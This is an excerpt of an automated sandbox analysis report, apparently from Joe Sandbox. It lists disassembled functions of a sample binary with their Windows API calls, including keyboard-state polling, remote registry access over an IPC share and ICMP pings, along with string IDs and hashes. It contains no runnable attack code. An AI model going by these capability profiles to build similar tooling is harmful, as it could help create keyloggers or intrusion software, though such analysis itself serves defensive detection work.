                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                      • String ID: BUTTON
                                                                      • API String ID: 1194449130-3405671355
                                                                      • Opcode ID: 39ebc8070d06976e5a2a15ecc55f00afaddf341ff301d6d59a29e38230073e09
                                                                      • Instruction ID: 4f076fe5244ecd09a2d1d3fd3968b26a2b4bf94ac89bf665e58186ba3741ae6a
                                                                      • Opcode Fuzzy Hash: 39ebc8070d06976e5a2a15ecc55f00afaddf341ff301d6d59a29e38230073e09
                                                                      • Instruction Fuzzy Hash: 36214CB0204315BFEB10DFA8FCC9B263A69F75575AB101436F506826A2DE65AC528B24
                                                                      Function 00A2E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00A2EA5D
                                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00A2EA73
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00A2EA84
                                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00A2EA96
                                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00A2EAA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: SendString$_wcslen
                                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                      • API String ID: 2420728520-1007645807
                                                                      • Opcode ID: 041f0b1a09fea1ddee6f9b768fda9a660eadf2515e30915667d172e2d619c932
                                                                      • Instruction ID: 3b4215a81059596d56d4ac53dde910fe986df5283176b7b930a6881e38c17ec7
                                                                      • Opcode Fuzzy Hash: 041f0b1a09fea1ddee6f9b768fda9a660eadf2515e30915667d172e2d619c932
                                                                      • Instruction Fuzzy Hash: 63115E31A9026979E724F7A5EC4AFFF7A7CFBD1B40F400829B811A20D1EAB00955C6B1
                                                                      Function 00A25CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00A25CE2
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00A25CFB
                                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00A25D59
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00A25D69
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00A25D7B
                                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00A25DCF
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00A25DDD
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00A25DEF
                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00A25E31
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00A25E44
                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00A25E5A
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00A25E67
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: 004c4679233b27e3a4a53d19ee6bfbaf7e594c9a6750a66681ef693b37cfdcbc
                                                                      • Instruction ID: c9aabfeb73c161ab8e9ea7a989bb66b9353b84870aebc7ee4ccb24dfb21c2a72
                                                                      • Opcode Fuzzy Hash: 004c4679233b27e3a4a53d19ee6bfbaf7e594c9a6750a66681ef693b37cfdcbc
                                                                      • Instruction Fuzzy Hash: 19512C70E00715AFDF18CFA8DD89AAEBBB5FB48311F148129F915E6694D7709E01CB50
                                                                      Function 009D8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009D8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,009D8BE8,?,00000000,?,?,?,?,009D8BBA,00000000,?), ref: 009D8FC5
                                                                      • DestroyWindow.USER32(?), ref: 009D8C81
                                                                      • KillTimer.USER32(00000000,?,?,?,?,009D8BBA,00000000,?), ref: 009D8D1B
                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00A16973
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,009D8BBA,00000000,?), ref: 00A169A1
                                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,009D8BBA,00000000,?), ref: 00A169B8
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,009D8BBA,00000000), ref: 00A169D4
                                                                      • DeleteObject.GDI32(00000000), ref: 00A169E6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 641708696-0
                                                                      • Opcode ID: cbb2e111858215e0a3a52c9f5c560d1e412eb28a00618c2c0d2e6aa883acdf59
                                                                      • Instruction ID: 11a4c3854aed6cc81884d1542c0ea4547b0946f26ae3924927c624a27ae41c0c
                                                                      • Opcode Fuzzy Hash: cbb2e111858215e0a3a52c9f5c560d1e412eb28a00618c2c0d2e6aa883acdf59
                                                                      • Instruction Fuzzy Hash: BA618E30552701DFCB25DF64D988B6A77F5FB50322F14891AE0829BAA1CB35A9C2DF90
                                                                      Function 009D9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009D9944: GetWindowLongW.USER32(?,000000EB), ref: 009D9952
                                                                      • GetSysColor.USER32(0000000F), ref: 009D9862
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ColorLongWindow
                                                                      • String ID:
                                                                      • API String ID: 259745315-0
                                                                      • Opcode ID: 88ad99ab739fdf913394b673798b2053b924e0c420240c7ef3e6e4b5df388f68
                                                                      • Instruction ID: 414ee3ba8683eaf4075efd3905939e5ea576bb07ecb7bed2bd4f6bd1220dcc0c
                                                                      • Opcode Fuzzy Hash: 88ad99ab739fdf913394b673798b2053b924e0c420240c7ef3e6e4b5df388f68
                                                                      • Instruction Fuzzy Hash: F641A6311447449FDF20AF789C84BB9376AFB06731F148616F9A2872E5D7319D42EB10
                                                                      Function 00A296E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00A0F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00A29717
                                                                      • LoadStringW.USER32(00000000,?,00A0F7F8,00000001), ref: 00A29720
                                                                        • Part of subcall function 009C9CB3: _wcslen.LIBCMT ref: 009C9CBD
                                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00A0F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00A29742
                                                                      • LoadStringW.USER32(00000000,?,00A0F7F8,00000001), ref: 00A29745
                                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00A29866
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                      • API String ID: 747408836-2268648507
                                                                      • Opcode ID: 473759a20e00524dddf5da0fa630adb09e55ed108c91c55a3506e3425455384a
                                                                      • Instruction ID: b0461f4438b3025dd9e9c20842c00e95f15107d0cb39db11d55cc39522cd33df
                                                                      • Opcode Fuzzy Hash: 473759a20e00524dddf5da0fa630adb09e55ed108c91c55a3506e3425455384a
                                                                      • Instruction Fuzzy Hash: B7415D72D00219AADB04FBE0DE46FEE7378AF94740F504129B60672092EB356F49CB62
                                                                      Function 00A206DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C6B57: _wcslen.LIBCMT ref: 009C6B6A
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00A207A2
                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00A207BE
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00A207DA
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00A20804
                                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00A2082C
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A20837
                                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00A2083C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                      • API String ID: 323675364-22481851
                                                                      • Opcode ID: 43dc75fe00457624c6f4ce2b08de82bda1cf51ac848ec7fc4e78908f229f917c
                                                                      • Instruction ID: dfd0e0dd56b1d0d8de0a5d90208b8baa500768f2d66b7799124b17b6eda8ff6b
                                                                      • Opcode Fuzzy Hash: 43dc75fe00457624c6f4ce2b08de82bda1cf51ac848ec7fc4e78908f229f917c
                                                                      • Instruction Fuzzy Hash: B341F472D10629AFDF15EBA4EC95EEEB778FF44354B444129E901A31A1EB309E04CBA1
                                                                      Function 00A43C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 00A43C5C
                                                                      • CoInitialize.OLE32(00000000), ref: 00A43C8A
                                                                      • CoUninitialize.OLE32 ref: 00A43C94
                                                                      • _wcslen.LIBCMT ref: 00A43D2D
                                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00A43DB1
                                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00A43ED5
                                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00A43F0E
                                                                      • CoGetObject.OLE32(?,00000000,00A5FB98,?), ref: 00A43F2D
                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00A43F40
                                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A43FC4
                                                                      • VariantClear.OLEAUT32(?), ref: 00A43FD8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                                      • String ID:
                                                                      • API String ID: 429561992-0
                                                                      • Opcode ID: d965c168becba83c277ed4cad40c321fcd0930628d1729ba0c00e8e918997711
                                                                      • Instruction ID: 30c070249bf29bffece4f11be6afedb374f86b3653eb8945fb3120951be108f9
                                                                      • Opcode Fuzzy Hash: d965c168becba83c277ed4cad40c321fcd0930628d1729ba0c00e8e918997711
                                                                      • Instruction Fuzzy Hash: 0EC11376A08301AFDB00DF68C88592AB7E9FFC9754F10491DF98A9B251D731EE06CB52
                                                                      Function 00A37A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 00A37AF3
                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00A37B8F
                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00A37BA3
                                                                      • CoCreateInstance.OLE32(00A5FD08,00000000,00000001,00A86E6C,?), ref: 00A37BEF
                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00A37C74
                                                                      • CoTaskMemFree.OLE32(?,?), ref: 00A37CCC
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00A37D57
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00A37D7A
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00A37D81
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00A37DD6
                                                                      • CoUninitialize.OLE32 ref: 00A37DDC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2762341140-0
                                                                      • Opcode ID: c14d35152e8551e48e218c43fd6c9144ea5f3fab415c1cace866acc068af75db
                                                                      • Instruction ID: 98824941810586c924e2a9ce8445499bbb63c15d050663c5a83e9081f9dd8de9
                                                                      • Opcode Fuzzy Hash: c14d35152e8551e48e218c43fd6c9144ea5f3fab415c1cace866acc068af75db
                                                                      • Instruction Fuzzy Hash: 9EC1EB75A04219AFCB14DFA4C884EAEBBF5FF48314F148499F41A9B261D731ED45CB90
                                                                      Function 00A5541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00A55504
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A55515
                                                                      • CharNextW.USER32(00000158), ref: 00A55544
                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00A55585
                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00A5559B
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A555AC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CharNext
                                                                      • String ID:
                                                                      • API String ID: 1350042424-0
                                                                      • Opcode ID: 789ddc91323418d73ead6dba1a70c683c66145d635c8f19dcc32abceba21f3aa
                                                                      • Instruction ID: c6bc1ed734ffbdf1c8d5ba637f91185e742cbdddaa94d945da16738d047c0381
                                                                      • Opcode Fuzzy Hash: 789ddc91323418d73ead6dba1a70c683c66145d635c8f19dcc32abceba21f3aa
                                                                      • Instruction Fuzzy Hash: E3617D70D00609EFDF10CFA4CC94AFE7BB9FB09722F108145F925A6290D7788A89DB60
                                                                      Function 00A1FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A1FAAF
                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00A1FB08
                                                                      • VariantInit.OLEAUT32(?), ref: 00A1FB1A
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00A1FB3A
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00A1FB8D
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00A1FBA1
                                                                      • VariantClear.OLEAUT32(?), ref: 00A1FBB6
                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00A1FBC3
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A1FBCC
                                                                      • VariantClear.OLEAUT32(?), ref: 00A1FBDE
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A1FBE9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                      • String ID:
                                                                      • API String ID: 2706829360-0
                                                                      • Opcode ID: fcbc157223d4084587d88b8995cff1d5819dc793b478ba9f6dab4cb386b9f337
                                                                      • Instruction ID: 914d0fbbea5656e06fc48439017a673691142ead33b386c89e432589a1005139
                                                                      • Opcode Fuzzy Hash: fcbc157223d4084587d88b8995cff1d5819dc793b478ba9f6dab4cb386b9f337
                                                                      • Instruction Fuzzy Hash: 6B414275A04319AFCB00DFA8C858DEDBBB9FF48355F008069E956A7265C734AA46CF90
                                                                      Function 00A29C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?), ref: 00A29CA1
                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00A29D22
                                                                      • GetKeyState.USER32(000000A0), ref: 00A29D3D
                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00A29D57
                                                                      • GetKeyState.USER32(000000A1), ref: 00A29D6C
                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00A29D84
                                                                      • GetKeyState.USER32(00000011), ref: 00A29D96
                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00A29DAE
                                                                      • GetKeyState.USER32(00000012), ref: 00A29DC0
                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00A29DD8
                                                                      • GetKeyState.USER32(0000005B), ref: 00A29DEA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: State$Async$Keyboard
                                                                      • String ID:
                                                                      • API String ID: 541375521-0
                                                                      • Opcode ID: c496ecba508c7017389c3819cc714f2d6f410409a6f08a3fdc3030f36958ed75
                                                                      • Instruction ID: ad03f5a077e4beb9c49121786f25d4ccf60c744fcbebcebf000ef82ccd70f61d
                                                                      • Opcode Fuzzy Hash: c496ecba508c7017389c3819cc714f2d6f410409a6f08a3fdc3030f36958ed75
                                                                      • Instruction Fuzzy Hash: C241E7345047D96DFF3487A8E8043B7BEE07F11B44F04807ADAC6565C2EBA499C8D7A2
                                                                      Function 00A4055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00A405BC
                                                                      • inet_addr.WSOCK32(?), ref: 00A4061C
                                                                      • gethostbyname.WSOCK32(?), ref: 00A40628
                                                                      • IcmpCreateFile.IPHLPAPI ref: 00A40636
                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A406C6
                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A406E5
                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00A407B9
                                                                      • WSACleanup.WSOCK32 ref: 00A407BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                      • String ID: Ping
                                                                      • API String ID: 1028309954-2246546115
                                                                      • Opcode ID: 15142036fd993970d1391d1ce584df158504fbabe5f64413600859aeee15bff5
                                                                      • Instruction ID: 78afe8c3c60fb574c4a0473795ad5f09b754f55eba3734da6f2aa91d388f88ec
                                                                      • Opcode Fuzzy Hash: 15142036fd993970d1391d1ce584df158504fbabe5f64413600859aeee15bff5
                                                                      • Instruction Fuzzy Hash: 03917C396047019FD320DF15C489F1ABBE0BF88318F1585A9F56A8B6A2C770ED41DF92
                                                                      Function 00A48CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
